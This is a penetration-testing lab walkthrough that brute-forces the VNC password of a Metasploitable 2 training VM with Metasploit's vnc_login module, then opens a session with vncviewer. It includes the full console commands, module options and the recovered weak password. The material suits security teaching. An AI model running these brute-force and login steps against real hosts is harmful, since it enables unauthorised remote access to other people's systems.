Goal: Establishing A VNC session To The Metasploitable 2 server.
1. To establish a VNC session we have to find out the VNC password. So Let me fire up Metasploit Framework and search vnc 3.3 (find out from Nmap scanning):
┌─[mrdev@mr-dev]─[~]
└──╼ $sudo msfdb init && sudo msfconsole
[sudo] password for mrdev:
[i] Database already started
[i] The database appears to be already configured, skipping initialization
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+
=[ metasploit v6.1.9-dev ]
+ -- --=[ 2169 exploits - 1149 auxiliary - 398 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Search can apply complex filters such as
search cve:2009 type:exploit, see all the filters
with help search
msf6 > search vnc 3.3
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/vnc/realvnc_client 2001-01-29 normal No RealVNC 3.3.7 Client Buffer Overflow
1 auxiliary/scanner/vnc/vnc_login normal No VNC Authentication Scanner
2 exploit/windows/vnc/winvnc_http_get 2001-01-29 average No WinVNC Web Server GET Overflow
Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/vnc/winvnc_http_get
msf6 >
2. There is an auxiliary module available to brute-forcing the VNC password, use that module and show the options to configure the module:
msf6 > use 1
msf6 auxiliary(scanner/vnc/vnc_login) > options
Module options (auxiliary/scanner/vnc/vnc_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Acce
pted: none, user, user&realm)
PASSWORD no The password to test
PASS_FILE /usr/share/metasploit-framework/dat no File containing passwords, one per line
a/wordlists/vnc_passwords.txt
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-f
ramework/wiki/Using-Metasploit
RPORT 5900 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME <BLANK> no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pa
ir per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf6 auxiliary(scanner/vnc/vnc_login) >
3. From the options we only need to set the RHOSTS (No need to set the wordlist as it is automatically configured):
msf6 auxiliary(scanner/vnc/vnc_login) > set RHOSTS 192.168.56.3
RHOSTS => 192.168.56.3
msf6 auxiliary(scanner/vnc/vnc_login) > run
[*] 192.168.56.3:5900 - 192.168.56.3:5900 - Starting VNC login sweep
[+] 192.168.56.3:5900 - 192.168.56.3:5900 - Login Successful: :password
[*] 192.168.56.3:5900 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/vnc/vnc_login) >
The auxiliary module execution succeeded and we have found the password marked in bold.
4. Now run the below command to start the VNC session:
┌─[mrdev@mr-dev]─[~]
└──╼ $vncviewer 192.168.56.3
TigerVNC Viewer 64-bit v1.11.0
Built on: 2021-03-22 21:21
Copyright (C) 1999-2020 TigerVNC Team and many others (see README.rst)
See https://www.tigervnc.org for information on TigerVNC.
Thu Jan 20 19:57:12 2022
DecodeManager: Detected 4 CPU core(s)
DecodeManager: Creating 4 decoder thread(s)
CConn: Connected to host 192.168.56.3 port 5900
CConnection: Server supports RFB protocol version 3.3
CConnection: Using RFB protocol version 3.3
The Pop-up screen appears on the screen and prompts me to input the password:
If the authentication is successful you can see the GUI of the Metasploitable 2 server:
